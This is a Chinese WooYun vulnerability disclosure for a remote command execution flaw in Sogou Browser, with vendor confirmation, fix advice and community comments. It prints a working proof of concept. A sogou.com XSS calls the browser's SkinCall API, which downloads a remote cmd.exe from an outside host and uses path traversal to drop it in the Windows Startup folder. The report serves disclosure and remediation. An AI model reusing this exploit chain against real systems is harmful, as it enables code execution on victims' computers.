当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-037211

漏洞标题:搜狗浏览器远程命令执行漏洞

相关厂商:搜狗

漏洞作者: 只抽红梅

提交时间:2013-09-15 14:54

修复时间:2013-12-14 14:54

公开时间:2013-12-14 14:54

漏洞类型:设计错误/逻辑缺陷

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-15: 细节已通知厂商并且等待厂商处理中
2013-09-16: 厂商已经确认,细节仅向厂商公开
2013-09-19: 细节向第三方安全合作伙伴开放
2013-11-10: 细节向核心白帽子及相关领域专家公开
2013-11-20: 细节向普通白帽子公开
2013-11-30: 细节向实习白帽子公开
2013-12-14: 细节向公众公开

简要描述:

对于推动企业安全问题的修复,乌云是一个再合适不过的平台了。看看这次能不能帮助到搜狗。

详细说明:

其实准确一点应该叫《搜狗浏览器下载文件到任意目录导致远程命令执行漏洞》。
强烈推荐黑哥的《去年跨过的浏览器》,地址:http://vdisk.weibo.com/s/z1id0otCRMVPt
国内为数不多的关于浏览器安全方面的资料,浏览器漏洞出自这里。
测试环境:
windows 2003 + 搜狗浏览器(4.1.3.9297)
1、下载漏洞

window.external.SkinCall("install", "cmd.exe", 0, "http://hongmei.me/cmd.exe", "instThmemeCallback");


上面代码调用浏览器 api,下载远程的文件到:C:\Documents and Settings\Administrator\Application Data\SogouExplorer\skin 目录内。
"cmd.exe" 这里可以通过 ../ 来跨目录,当我们跨目录把远程文件下载到:C:\Documents and Settings\Administrator\「开始」菜单\程序\启动 目录内就达到了远程命令执行的效果。
2、XSS
要调用的 api 有权限控制,*.sogou.com 域有权限调用,我们就找个 XSS 来:
http://player.mbox.sogou.com/FlashMP3Player.swf?isFlashReady=function(){if(!window.x){alert(1);window.x=1;}}
3、POC
到这里就只差 POC 了,构造如下:
http://player.mbox.sogou.com/FlashMP3Player.swf?isFlashReady=function(){if(!window.x){window.external.SkinCall("install", "../../../「开始」菜单/程序/启动/cmd.exe", 0, "http://hongmei.me/cmd.exe", "instThmemeCallback");window.x=1;}}
4、效果

sogou.png


PS:
1、下载到皮肤的目录浏览器默认会加上后缀,但是跨出去就没有了,为什么跨出去的时候不也加上呢?
2、启动目录和皮肤目录都在当前用户目录下,所以漏洞不受用户名的限制

漏洞证明:

sogou.png

修复方案:

1、修复本文中的 XSS,以及所有 *.sogou.com 域下的 XSS
2、严格控制 api 的权限
3、限制下载文件的域名以及禁止跨目录

版权声明:转载请注明来源 只抽红梅@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2013-09-16 12:35

厂商回复:

收到,感谢提供!

最新状态:

暂无


漏洞评价:

评论

  1. 2013-09-15 15:03 | 78基佬 ( 实习白帽子 | Rank:84 漏洞数:20 | 不会日站的设计师不是好产品经理)

    手机app还是电脑的浏览器???

  2. 2013-09-15 15:04 | 淡漠天空 认证白帽子 ( 实习白帽子 | Rank:1113 漏洞数:142 | M:出售GOV STATE NSA CIA NASA DHS Symant...)

    尼玛又开始了。。。。poc真多

  3. 2013-09-16 10:14 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    你是来刷钱的吧

  4. 2013-09-16 10:55 | 只抽红梅 ( 普通白帽子 | Rank:157 漏洞数:13 | 红梅花儿开,我从帝都来!)

    @xsser 难道我们不是怀着为了让安全变得更美好而来的么?

  5. 2013-09-16 12:26 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @只抽红梅 嗯 是的

  6. 2013-09-16 14:13 | 只抽红梅 ( 普通白帽子 | Rank:157 漏洞数:13 | 红梅花儿开,我从帝都来!)

    @搜狗 好不厚道啊

  7. 2013-09-19 15:47 | riskuusk ( 路人 | Rank:1 漏洞数:1 | world have risk)

    老问题吧,这个搜狗PC浏览器的命令执行,之前都有人搞过了,跟我一样刷分的。